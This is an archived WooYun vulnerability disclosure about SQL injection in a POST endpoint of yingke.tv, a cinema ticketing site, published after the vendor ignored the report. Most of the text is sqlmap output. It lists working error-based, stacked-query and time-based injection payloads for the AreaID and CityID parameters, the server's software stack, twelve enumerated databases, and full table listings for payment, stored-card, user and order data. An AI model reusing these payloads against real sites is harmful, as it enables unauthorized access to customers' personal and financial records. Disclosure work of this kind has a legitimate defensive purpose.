乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-13: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-11-27: 厂商已经主动忽略漏洞,细节向公众公开
包含用户信息、票务信息、订单信息...还有很多没有细看
http://www.yingke.tv/handle/Movies.ashx (POST)AreaID=-1&CityID=11&flag=page&pageindex=1&pid=1&showType=1&strwhere=&values=
sqlmap identified the following injection point(s) with a total of 432 HTTP(s) requests:---Parameter: AreaID (POST) Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: AreaID=-1' AND 2786=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(106)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (2786=2786) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(118)+CHAR(98)+CHAR(113))) AND 'jQEr'='jQEr&CityID=11&flag=page&pageindex=1&pid=1&showType=1&strwhere=&values= Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: AreaID=-1';WAITFOR DELAY '0:0:5'--&CityID=11&flag=page&pageindex=1&pid=1&showType=1&strwhere=&values= Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind (comment) Payload: AreaID=-1' WAITFOR DELAY '0:0:5'--&CityID=11&flag=page&pageindex=1&pid=1&showType=1&strwhere=&values=Parameter: CityID (POST) Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: AreaID=-1&CityID=11' AND 7580=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(106)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (7580=7580) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(118)+CHAR(98)+CHAR(113))) AND 'Nrhf'='Nrhf&flag=page&pageindex=1&pid=1&showType=1&strwhere=&values= Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: AreaID=-1&CityID=11';WAITFOR DELAY '0:0:5'--&flag=page&pageindex=1&pid=1&showType=1&strwhere=&values= Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind (comment) Payload: AreaID=-1&CityID=11' WAITFOR DELAY '0:0:5'--&flag=page&pageindex=1&pid=1&showType=1&strwhere=&values=---web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5back-end DBMS: Microsoft SQL Server 2008sqlmap resumed the following injection point(s) from stored session:---Parameter: AreaID (POST) Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: AreaID=-1' AND 2786=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(106)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (2786=2786) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(118)+CHAR(98)+CHAR(113))) AND 'jQEr'='jQEr&CityID=11&flag=page&pageindex=1&pid=1&showType=1&strwhere=&values= Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: AreaID=-1';WAITFOR DELAY '0:0:5'--&CityID=11&flag=page&pageindex=1&pid=1&showType=1&strwhere=&values= Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind (comment) Payload: AreaID=-1' WAITFOR DELAY '0:0:5'--&CityID=11&flag=page&pageindex=1&pid=1&showType=1&strwhere=&values=Parameter: CityID (POST) Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: AreaID=-1&CityID=11' AND 7580=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(106)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (7580=7580) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(118)+CHAR(98)+CHAR(113))) AND 'Nrhf'='Nrhf&flag=page&pageindex=1&pid=1&showType=1&strwhere=&values= Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: AreaID=-1&CityID=11';WAITFOR DELAY '0:0:5'--&flag=page&pageindex=1&pid=1&showType=1&strwhere=&values= Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind (comment) Payload: AreaID=-1&CityID=11' WAITFOR DELAY '0:0:5'--&flag=page&pageindex=1&pid=1&showType=1&strwhere=&values=---web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5back-end DBMS: Microsoft SQL Server 2008available databases [12]:[*] EasyPay[*] master[*] model[*] msdb[*] ReportServer[*] ReportServerTempDB[*] tempdb[*] Test[*] WeiXinDataBase[*] YingKeData[*] YingKeDataTest[*] YKStoredCardsqlmap resumed the following injection point(s) from stored session:---Parameter: AreaID (POST) Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: AreaID=-1' AND 2786=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(106)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (2786=2786) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(118)+CHAR(98)+CHAR(113))) AND 'jQEr'='jQEr&CityID=11&flag=page&pageindex=1&pid=1&showType=1&strwhere=&values= Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: AreaID=-1';WAITFOR DELAY '0:0:5'--&CityID=11&flag=page&pageindex=1&pid=1&showType=1&strwhere=&values= Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind (comment) Payload: AreaID=-1' WAITFOR DELAY '0:0:5'--&CityID=11&flag=page&pageindex=1&pid=1&showType=1&strwhere=&values=Parameter: CityID (POST) Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: AreaID=-1&CityID=11' AND 7580=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(106)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (7580=7580) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(118)+CHAR(98)+CHAR(113))) AND 'Nrhf'='Nrhf&flag=page&pageindex=1&pid=1&showType=1&strwhere=&values= Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: AreaID=-1&CityID=11';WAITFOR DELAY '0:0:5'--&flag=page&pageindex=1&pid=1&showType=1&strwhere=&values= Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind (comment) Payload: AreaID=-1&CityID=11' WAITFOR DELAY '0:0:5'--&flag=page&pageindex=1&pid=1&showType=1&strwhere=&values=---web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5back-end DBMS: Microsoft SQL Server 2008Database: ReportServerTempDB[9 tables]+-----------------------------------------------------+| ChunkData || ChunkSegmentMapping || ExecutionCache || PersistedStream || Segment || SegmentedChunk || SessionData || SessionLock || SnapshotData |+-----------------------------------------------------+Database: tempdb[18 tables]+-----------------------------------------------------+| #1590259A || #23DE44F1 || #24D2692A || #27AED5D5 || #28A2FA0E || #29971E47 || #2D67AF2B || #2E5BD364 || #2F4FF79D || #30441BD6 || #75235608 || #76177A41 || #770B9E7A || #77FFC2B3 || #78F3E6EC || #79E80B25 || #7ADC2F5E || #7BD05397 |+-----------------------------------------------------+Database: EasyPay[86 tables]+-----------------------------------------------------+| tAgent || tBankAccountType || tBankBalance || tBillType || tBookingRecord || tCaiXinRecords || tCaiXinUser || tCard || tCardBin || tCardInStorage || tCardMap || tCardPhysicsType || tChargeRecord || tCodeTable || tCommisionRate || tContact || tDailyActionStatistics || tDailyAgentStatistics || tDailyBalance || tDailyDingDanStatistics || tDailyIssueAndMerchantStatistics || tDailyMerchantPhysicsStatistics || tDailyMerchantStatistics || tDailyMerchantTerminalStatistics || tDailyPhysicsStatistics || tDailyPriceTable || tDailyStatistics || tDeposit || tDiscountType || tEnterprise || tEnterpriseStatistics || tField || tFieldBookRecord || tFieldDiscountRule || tFieldGroup || tFieldScoreRule || tFieldType || tFinalHisTradeRecords || tFunction || tFunctionType || tGoods || tGoodsDiscountRule || tGoodsSaleRecord || tGoodsScoreRule || tGoodsType || tHisCard || tHisLog || tHisSaleCardRecord || tHisTradeRecords || tIssueMoney || tItemClass || tLog || tLogLevel || tLogType || tMakeCardApplication || tMember || tMemberAuthority || tMemberLevel || tOffJobCalc || tOldCard || tOperator || tOrgan || tOrganCardBin || tOrganType || tPosAuthority || tPosConsumptionRecord || tPosSerial || tPriceTable || tPurchaseGoodsRecord || tPurview || tRechargeScoreRule || tRole || tSaleCardRecord || tScoreType || tStadium || tStatusCode || tTakeCardAuth || tTerminal || tTicket || tTicketAction || tTicketDingDan || tTicketProject || tTicketTradeRecords || tTongJi || tTradeRecords || ttestcard |+-----------------------------------------------------+Database: ReportServer[31 tables]+-----------------------------------------------------+| ActiveSubscriptions || Batch || CachePolicy || Catalog || ChunkData || ChunkSegmentMapping || ConfigurationInfo || DataSource || Event || ExecutionLogStorage || History || Keys || ModelDrill || ModelItemPolicy || ModelPerspective || Notifications || Policies || PolicyUserRole || ReportSchedule || Roles || RunningJobs || Schedule || SecData || Segment || SegmentedChunk || ServerParametersInstance || SnapshotData || Subscriptions || SubscriptionsBeingDeleted || UpgradeInfo || Users |+-----------------------------------------------------+Database: YingKeData[68 tables]+-----------------------------------------------------+| JD_Order || JD_OrderTicket || LSB || M_Advertisement || M_BindCard || M_BlackIP || M_CancelTicket || M_CardAddvalue || M_CardMerge || M_City || M_CityArea || M_DisTicket || M_FocusImg || M_Help || M_Links || M_Message || M_Movies || M_NewOrder || M_News || M_Order || M_OrderCardInfo || M_Place || M_Prize || M_PrizeOrder || M_PrizeShop || M_Product || M_ProductType || M_ProductTypePlace || M_ServiceQQ || M_Trade || M_TradeAddvalue || M_TradeArea || M_TradeCompany || M_TradeCompanyCardOrder || M_TradeCompanyTicketCode || M_TradeCompanyTicketOrder || M_TradeTicket || M_Trade_bak || M_User || M_UserAddress || M_UserOrderAddress || M_WhiteIP || SM_Dept || SM_Log || SM_MenuTree || SM_Role || SM_RoleMenu || SM_Sequences || SM_User || SM_UserRole || SM_VisitUser || S_Category || S_CategorySub || S_GroupBuy || S_GroupBuyOrder || S_ShopOrder || S_ShopProduct || V_GroupBuyOrder || V_PrizeOrder || V_ProductPlace || V_ProductTypePlace || V_ShopOrder || V_TicketPlace || V_TradeAddvalue || V_TradeCompanyCardOrder || V_TradeCompanyTicketInfo || V_TradeCompanyTicketOrder || V_TradeTicket |+-----------------------------------------------------+Database: msdb[102 tables]+-----------------------------------------------------+| MSdbms || MSdbms_datatype || MSdbms_datatype_mapping || MSdbms_map || backupfile || backupfilegroup || backupmediafamily || backupmediaset || backupset || log_shipping_monitor_alert || log_shipping_monitor_error_detail || log_shipping_monitor_history_detail || log_shipping_monitor_primary || log_shipping_monitor_secondary || log_shipping_primaries || log_shipping_primary_databases || log_shipping_primary_secondaries || log_shipping_secondaries || log_shipping_secondary || log_shipping_secondary_databases || logmarkhistory || restorefile || restorefilegroup || restorehistory || sqlagent_info || suspect_pages || sysalerts || syscachedcredentials || syscategories || syscollector_blobs_internal || syscollector_collection_items_internal || syscollector_collection_sets_internal || syscollector_collector_types_internal || syscollector_config_store_internal || syscollector_execution_log_internal || syscollector_execution_stats_internal || syscollector_tsql_query_collector || sysdbmaintplan_databases || sysdbmaintplan_history || sysdbmaintplan_jobs || sysdbmaintplans || sysdownloadlist || sysdtscategories || sysdtspackagelog || sysdtspackages || sysdtssteplog || sysdtstasklog || sysjobactivity || sysjobhistory || sysjobs || sysjobschedules || sysjobservers || sysjobsteps || sysjobstepslogs || sysmail_account || sysmail_attachments || sysmail_attachments_transfer || sysmail_configuration || sysmail_log || sysmail_mailitems || sysmail_principalprofile || sysmail_profile || sysmail_profileaccount || sysmail_query_transfer || sysmail_send_retries || sysmail_server || sysmail_servertype || sysmaintplan_log || sysmaintplan_logdetail || sysmaintplan_subplans || sysmanagement_shared_registered_servers_internal || sysmanagement_shared_server_groups_internal || sysnotifications || sysoperators || sysoriginatingservers || syspolicy_conditions_internal || syspolicy_configuration_internal || syspolicy_execution_internal || syspolicy_facet_events || syspolicy_management_facets || syspolicy_object_sets_internal || syspolicy_policies_internal || syspolicy_policy_categories_internal || syspolicy_policy_category_subscriptions_internal || syspolicy_policy_execution_history_details_internal || syspolicy_policy_execution_history_internal || syspolicy_system_health_state_internal || syspolicy_target_set_levels_internal || syspolicy_target_sets_internal || sysproxies || sysproxylogin || sysproxysubsystem || sysschedules || syssessions || sysssislog || sysssispackagefolders || sysssispackages || syssubsystems || systargetservergroupmembers || systargetservergroups || systargetservers || systaskids |+-----------------------------------------------------+Database: YKStoredCard[87 tables]+-----------------------------------------------------+| tAgent || tBankAccountType || tBankBalance || tBillType || tBookingRecord || tCaiXinRecords || tCaiXinUser || tCard || tCardBin || tCardInStorage || tCardMap || tCardPhysicsType || tCardStatus || tChangeCard || tChargeRecord || tCodeTable || tCommisionRate || tContact || tDailyActionStatistics || tDailyAgentStatistics || tDailyBalance || tDailyDingDanStatistics || tDailyIssueAndMerchantStatistics || tDailyMerchantPhysicsStatistics || tDailyMerchantStatistics || tDailyMerchantTerminalStatistics || tDailyPhysicsStatistics || tDailyPriceTable || tDailyStatistics || tDeposit || tDiscountType || tEnterprise || tEnterpriseStatistics || tField || tFieldBookRecord || tFieldDiscountRule || tFieldGroup || tFieldScoreRule || tFieldType || tFinalHisTradeRecords || tFunction || tFunctionType || tGoods || tGoodsDiscountRule || tGoodsSaleRecord || tGoodsScoreRule || tGoodsType || tHisCard || tHisLog || tHisSaleCardRecord || tHisTradeRecords || tIssueMoney || tLog || tLogLevel || tLogType || tMakeCardApplication || tMember || tMemberAuthority || tMemberLevel || tOffJobCalc || tOldCard || tOperator || tOrgan || tOrganCardBin || tOrganType || tPosAuthority || tPosConsumptionRecord || tPosSerial || tPriceTable || tPurchaseGoodsRecord || tPurview || tRechargeScoreRule || tRole || tSaleCardRecord || tScoreType || tStadium || tStatusCode || tTakeCardAuth || tTerminal || tTicket || tTicketAction || tTicketDingDan || tTicketProject || tTicketTradeRecords || tTongJi || tTradeRecords || ttestcard |+-----------------------------------------------------+Database: WeiXinDataBase[28 tables]+-----------------------------------------------------+| tAgent || tAgentFunc || tAgentFuncRelation || tAgentLog || tAgentOrder || tAgentOrderTicket || tAgentProduct || tCardPool || tCardTemp || tChat || tCinema || tCinemaProduct || tCinemaType || tCity || tCityArea || tCustomMsg || tFunction || tJianYi || tLog || tMenu || tMsg || tOrderIDCreate || tProduct || tProductCount || tSeesion || tUser || tUserOrder || tUserOrderTicket |+-----------------------------------------------------+Database: master[6 tables]+-----------------------------------------------------+| MSreplication_options || spt_fallback_db || spt_fallback_dev || spt_fallback_usg || spt_monitor || spt_values |+-----------------------------------------------------+Database: Test[16 tables]+-----------------------------------------------------+| OnlineSeatOrder || PayInfo || SendTicketMsg || tRelateCinema || tRelateFilm || tThirdCinema || tThirdCinemaNotify || tThirdCity || tThirdFilm || tThirdFilmNotify || tThirdHall || tThirdMerchant || tThirdPriceRule || tThirdRegion || tThirdSeat || tThirdShow |+-----------------------------------------------------+Database: YingKeDataTest[51 tables]+-----------------------------------------------------+| JD_Order || JD_OrderTicket || M_Advertisement || M_BindCard || M_CancelTicket || M_CardAddvalue || M_City || M_CityArea || M_DisTicket || M_FocusImg || M_Help || M_Links || M_Message || M_Movies || M_NewOrder || M_News || M_Order || M_OrderCardInfo || M_Place || M_Prize || M_PrizeOrder || M_PrizeShop || M_Product || M_ProductType || M_ProductTypePlace || M_Trade || M_TradeAddvalue || M_TradeArea || M_TradeCompany || M_TradeCompanyCardOrder || M_TradeCompanyTicketCode || M_TradeCompanyTicketOrder || M_TradeTicket || M_User || M_UserAddress || M_UserOrderAddress || SM_Dept || SM_Log || SM_MenuTree || SM_Role || SM_RoleMenu || SM_Sequences || SM_User || SM_UserRole || SM_VisitUser || S_Category || S_CategorySub || S_GroupBuy || S_GroupBuyOrder || S_ShopOrder || S_ShopProduct |+-----------------------------------------------------+
过滤
未能联系到厂商或者厂商积极拒绝